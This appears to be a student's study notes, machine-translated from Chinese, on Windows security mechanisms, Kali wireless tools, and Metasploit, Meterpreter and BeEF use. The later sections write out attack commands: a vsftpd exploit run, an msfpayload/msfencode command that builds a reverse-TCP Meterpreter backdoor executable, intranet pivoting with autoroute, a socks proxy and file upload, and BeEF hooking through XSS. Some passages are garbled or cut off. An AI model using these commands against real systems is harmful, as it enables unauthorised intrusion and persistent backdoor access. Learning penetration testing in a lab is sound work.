learning materials
Chapter VII Security Protection of Windows Operating System
- Windows OS Framework
- The development and current situation of
Windows operating system Windows occupies a very high market share in desktop operating systems, and Windows XP system still has a large number of users in China - Basic structure
of Windows operating system 1. Basic modules of Windows operating system kernel: Windows executive body, Windows kernel body, device driver, hardware abstraction layer, Windows window and GUI interface kernel implementation code.
2. The code modules of Windows operating system in user mode: system support process, environment subsystem service process, service process, user application software, core subsystem DLL.
3, the core mechanism: Windows process and thread management mechanism, Windows memory management mechanism, Windows file management mechanism, Windows registry management mechanism, Windows network mechanism.
The network structure of the Windows system, from the physical layer to the application layer of the OSI network reference model, the corresponding Windows network component modules of each layer include: ①Network
card hardware device driver, located in the OSI physical layer
②NDIS library and miniport driver, located in the OSI link Layer
③TDI transport layer, also known as network protocol driver, located in OSI network layer and transport layer ④Network
API DLL and TDI client, corresponding to OSI session layer and presentation layer
⑥Network application and service process, corresponding to OSI application layer
- The development and current situation of
- Security Architecture and Mechanism of Windows Operating System
- The Windows security architecture
implements the basic object security model based on the Reference Monitor model. The core is the SRM (Security Reference Monitor) security reference monitor located in the kernel, and the LSASS security service located in the user mode. - Windows authentication mechanisms
are divided into three categories: users, user groups, and computers. Each security principal is identified by a globally unique SID security identifier both in time and space.
Windows user passwords are encrypted and stored in the SAM or Active Directory AD. The local user account password information is encrypted with an irreversible 128-bit random key Hash and stored in the SAM file.
The Windows process, the GINA graphical login window, and the LSASS service cooperate to complete the local authentication process. - Windows authorization and access control mechanism
Windows authorization and access control mechanism is based on the reference monitor model, which is implemented by the SRM module in the kernel and the LSASS service in the user mode.
Windows abstracts all resources that need to be protected in the system into objects, and each object is associated with an SD Security Descriptor (Security Descriptor), which is associated with an object descriptor, consisting of the following attributes: Owner SID, Group SID, DACL autonomous Access Control List, SACL System Audit Access Control List. - Windows security audit mechanism
The system audit policy is defined by the system administrator in the local security policy to determine which events the system records. - Other Windows Security Mechanisms
Windows Security Center integrates the three most critical security measures to protect the safe and stable operation of Windows systems: firewall, automatic patch update, and virus protection. In addition to Security Center, Windows security features include IPSec encryption and authentication mechanism, EFS encrypted file system, Windows file protection mechanism, and the privacy protection and browsing security protection mechanism provided by the bundled IE browser.
- The Windows security architecture
- Windows remote security attack and defense technology
Windows remote attack technology can be divided into: remote password guessing and cracking attacks, attacking Windows network services, attacking Windows clients and users- Windows System Security Vulnerability Life Cycle
Windows Security Vulnerability Discovery, Exploitation and Patching Process
Security Vulnerability Public Disclosure Information Base: Several well-known general vulnerability information bases: CVE, NVD, SecurityFocus, OSVDB, etc.
Penetration testing attack process for a specific target: ① Vulnerability scanning test ② Find penetration code for discovered vulnerabilities ③ Implement penetration testing
Use Metasploit software to implement penetration testing
Metasploit is a completely open source penetration testing software. Adopting an extensible model of development framework and modular components, the Metasploit Framework (MSF) library written in Ruby language serves as the basic core of the entire software, providing a platform for the development and testing of penetration testing components; the modular components are the code that actually implements penetration attacks.
Metasploit provides four different user interaction interfaces: CLI, Console, Web, and GUI, of which the Console terminal is the most commonly used method. - Windows remote
password
guessing and cracking attacks - Windows network service remote penetration attack
Windows operating system defaults to open ports 135 (TCP), 137 (UDP), 139 (TCP) and 445 (TCP), the corresponding network services are MSRPC and procedure call services, NetBIOS network basic input output system services and SMB file and printer sharing services.
Well-known vulnerabilities and attacks on NetBIOS network services Well-known vulnerabilities and attacks
on SMB network services Well-known vulnerabilities and attacks
on MSRPC network services
Remote penetration attacks on Microsoft network services
on Windows systems Remote penetration attacks on third-party network services on Windows systems
Network service remote penetration attack prevention measures
- Windows System Security Vulnerability Life Cycle
- Windows local security attack and defense technology
- Windows local privilege escalation
ultimate privilege: Administrator or Local System account. The attack technique of attempting to gain privileged accounts from restricted user rights is also known as privilege escalation. - Windows Sensitive Information Stealing Windows System
Password Ciphertext Extraction Technology
Windows System Password Cracking Technology
Turn off the audit function in Windows and
clear the event log
. Preventive measures against the disappearance of the trace- Windows Remote Control and Backdoor Program
Command Line Remote Control Tool
Graphical Remote Control Tool
Preventive Measures Against Backdoor Programs
- Windows local privilege escalation
video learning
Kali Wireless Security Analysis Tool
RFID/NFC tools
Related to this is the attack and cracking of IC cards. Meal cards, room cards, and water cards can all be targeted for attack testing.
Software Defined Radio
Reference website: http://geekcar.net/archives/7748
Bluetooth Toolset
Wireless Network Analysis Tool
The BackTrack family is known for this and includes tools like the Aircrack-ng wireless network analysis suite
1. Aircrack
Aircrack-ng is a security software related to 802.11 standard wireless network analysis, the main functions: network detection, packet sniffing, WEP and WPA/WPA-2 cracking.
Download address: http://www.aircrack-ng.org/
2. Cowpatty , a well-known WPA-PSK handshake package password cracking tool
3, EAPMD5PASS password cracking tool for EAPMD5
4. fern-wifi-cracker has a graphical interface, written in Python, you
can check the external wireless network card under Kali
5. MDK3 is a wireless DOS attack test tool, which can launch attacks in Beacon Flood, Authentication DoS and other modes, and also has functions
such as brute force detection mode for hidden ESSID, 802.1X penetration test, and WIDS interference.
6. wifite , an automatic wireless network audit tool, can complete automatic cracking. Python scripting, combined with Aircrack-ng suite and Reaver tool.
7. Reaver , crack the PIN code of the router that enables WPS. Most routers have WPS enabled.
For PIN code cracking, refer to: http://blog.csdn.net/tinyeyeser/article/details/17127805
BSSID refers to the MAC address of the site.
Retrieval and Exploitation of Kali Vulnerabilities
1. searchsploit can use keywords to search for vulnerability information and the corresponding exp of the vulnerability to searchsploit wordpress
list the vulnerabilities and file addresses
to view the listed files, for example:
2. ikat automatically opens different exp. Waiting for the target to visit.
3. termineter aims to assess the security of smart meters
Metasploit Basics of Kali Exploitation
Metasploit is often used in penetration testing. This software includes many tools that form a complete attack framework.
1. Start the service To use Metasploit
in Kali, you need to start the PostgreSQL database service and the metasploit service first, and then you can use the msf database to query exploits and records. 2. Path introduction The path of msf in Kali is /usr/share/metasploit-framework 3. The basic command msfpayload: used to generate payload or shellcode. Searches can be used to query; the -o option can list the parameters required by the payload. msfencode: The encoder in msf, which was used to bypass AV (antivirus software) in the early days, and is now commonly used to encode msfpayload with it to avoid bad strings of exploits. msfconsole: Open the console of metasploit. Enter msfconsole to open msf
msfpayload -l |gre[ "windows"
4. Test example: find vulnerabilities, search for exploit and nmap -sV 222.28.136.171
you can see that the ftp service is open on port 21. The version used is vsftpd 2.3.4. Is there a vulnerability in this version? Search
in msf to find a matchsearch vsftpd
5. Test example: select exploit to view parameters
There was a small problem when entering the exploit. After checking, I found that I made an input error. After correcting it, I entered the
viewing parameters correctly. I found that the parameters of RHOST have not been set, and then set the parameters for it.set RHOST 222.28.136.171
6. Test example: select payload
After setting, show optionscheck the parameters and find that there are no parameters to set.
8. The attack test can be performed by executing the attack
input exploit. If successful, a shell will be returned:
At this point, you can view the id, ip address, and some file information, etc., to obtain the permissions of the target host
Introduction to Meterpreter for Kali Vulnerability Exploitation
Generate Meterpreter backdoor; open MSF, enable monitoring (select exploit/multi/handler); execute door.exe on the target machine; set the LHOST and LPORT parameters of reverse_tcp msfpayload windows/meterpreter/reverse_tcp LHOST=222.28.136.234 LPORT=2333 R | msfencode -t exe -c 5 > /root/door.exe /* 查看自己的IP地址为222.28.136.234,LHOST、LPORT为reverse_tcp的参数,可以在msf里查看到(记得把服务启动)*/
touse exploit/multi/handler receive the returned connection
At this point, the command to generate the backdoor is executed 
to generate the door.exe file
Post-Metasploit Penetration Testing of Kali Exploit
After the springboard has obtained certain permissions, it is necessary to actively develop the permissions of the intranet host, obtain the specified target information, and probe for system vulnerabilities. With the help of the Meterpreter backdoor that msf has obtained, the series of operations can be easier.
1. View the current network card and network segment information (using ifconfig). You can see three network cards, one is the local network card, the other is the network card we can access, and the other network card has an internal network IP (can not access, you can try ping below).
2. Adding routing tables run autoroute -s 10.0.0.1can use the modules in msf to attack or scan across network segments. Quickly added via script autoroute.
3. Open socket proxy, create a socks proxy by using auxiliary/server/socks4a module, which can be used for browser, sqlmap, nmap. You can access intranet computers through a proxy.
4. You can freely switch to the session through background and session -i.
5. Enter run to see many commands that can be done on the meterpreter.
6. You can see the post-penetration test module through run post/.
7. Obtain intranet information. run arp_scanner -r 10.0.0.1/24
8. You can also upload files and perform port forwarding for subsequent testing, such as upload lcx.exe c:\\transferring files to the root directory of the c drive.
BeeF exploited by Kali
1. Start BeeF on the command line beef-xss
2. Suppose the host under test requests to http://127.0.0.1:3000/demos/basic.html due to the XSS vulnerability. 
At this time, there will be an online host on the left side of the page: 
here , the input is hello world, the following returns success!
5. Proxy function (proxy function)
Select the target host, right-click, and select Use as Proxy in the menu; then edit and send the content you want to send in Forge Request in the Rider tab.
6. BeEF does not load Metasploit by default. If you want to use Metasploit's rich attack modules, you need to do some configuration.
Default: 
Configuration:
First open the beef xss directory
cd /usr/share/beef-xss/
ls
nano config.yaml /* 编辑一下,可以看到有很多配置信息,包括用户名、密码都可以在这设置,在此将Metasploit的false修改为true */
clear
Make sure that the IP and other information here are set correctly (127.0.0.1 is not applicable, you need to use the local IP), and modify the Custom path:
cd extensions/metasploit/
ls
nano config.yaml /* 将host和callback_host行的IP修改为本机IP,并修改custom路径为/usr/share/metasploit-framework/ */After configuration, open msfconsole and run the command:
load msgrpc ServerHost=222.28.136.234 Pass=abc123
After ./beef -x
the exploit module of reloading Metasploit is 
loaded, restart the service
service beef-xss restart
At this time, visit the following previous pages again, and find that you cannot connect. Wait for a while and log in with the default user password. I found that there are many more modules under Metasploit: